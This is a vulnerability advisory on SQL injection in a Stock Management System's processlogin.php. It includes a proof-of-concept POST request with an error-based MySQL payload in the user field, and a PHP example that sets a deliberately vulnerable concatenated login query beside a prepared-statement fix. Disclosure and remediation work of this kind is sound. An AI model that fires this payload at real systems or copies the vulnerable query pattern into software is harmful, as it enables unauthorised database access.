SQL injection vulnerability in Stock Management System
In processlogin.php, lines 7 to 9 receive the user and password parameters passed from the front end and hash the password with SHA-1. Lines 18 to 25 substitute the user and password into a database query for verification. Because the values are not filtered before being placed in the query, this creates a SQL injection vulnerability.
SQL injection proof
SQLMAP
Burp Suite
POC:
POST /pages/processlogin.php HTTP/1.1
Host: vulscms.test
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulscms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulscms.test/pages/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=roq9qu2s58ta48gg165qqke6l9
Connection: close

user=1' AND GTID_SUBSET(CONCAT((SELECT USER())),5439)-- ace&password=1&btnlogin=
Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4
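The pattern described in the report beside its parameterized fix, as an added example that is not the project's own code. The `users` table, its column names, both function names and the in-memory SQLite database are assumptions made so the script runs offline; the application itself uses MySQL.

```php
<?php
// Added example. Table and column names and the SQLite in-memory database
// are assumptions; the sample account below is constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$seed = $db->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
$seed->execute(["o'brien", sha1('constructed-password')]);

// Pattern the report describes: request values concatenated into the SQL text.
function login_concat(PDO $db, string $user, string $pass): ?int
{
    $hash = sha1($pass); // SHA-1 mirrors the report's description
    $sql  = "SELECT id FROM users WHERE username = '$user' AND password = '$hash'";
    $row  = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['id'] : null;
}

// Hardened form: placeholders keep the values out of the SQL grammar, so the
// statement text is fixed before any request data is seen.
function login_prepared(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, sha1($pass)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['id'] : null;
}

// Constructed input: a legitimate username that contains a single quote.
$user = "o'brien";
$pass = 'constructed-password';

try {
    var_dump(login_concat($db, $user, $pass));
} catch (PDOException $e) {
    // The quote ends the string literal early, so the rest of the input is
    // parsed as SQL instead of being compared as data.
    echo 'concatenated query failed: ', $e->getMessage(), "\n";
}

// The same input is compared as a plain value by the prepared statement.
var_dump(login_prepared($db, $user, $pass));
var_dump(login_prepared($db, $user, 'wrong-password'));
```

With MySQL the same fix applies through `mysqli::prepare()` with `bind_param()`, or PDO with the MySQL driver.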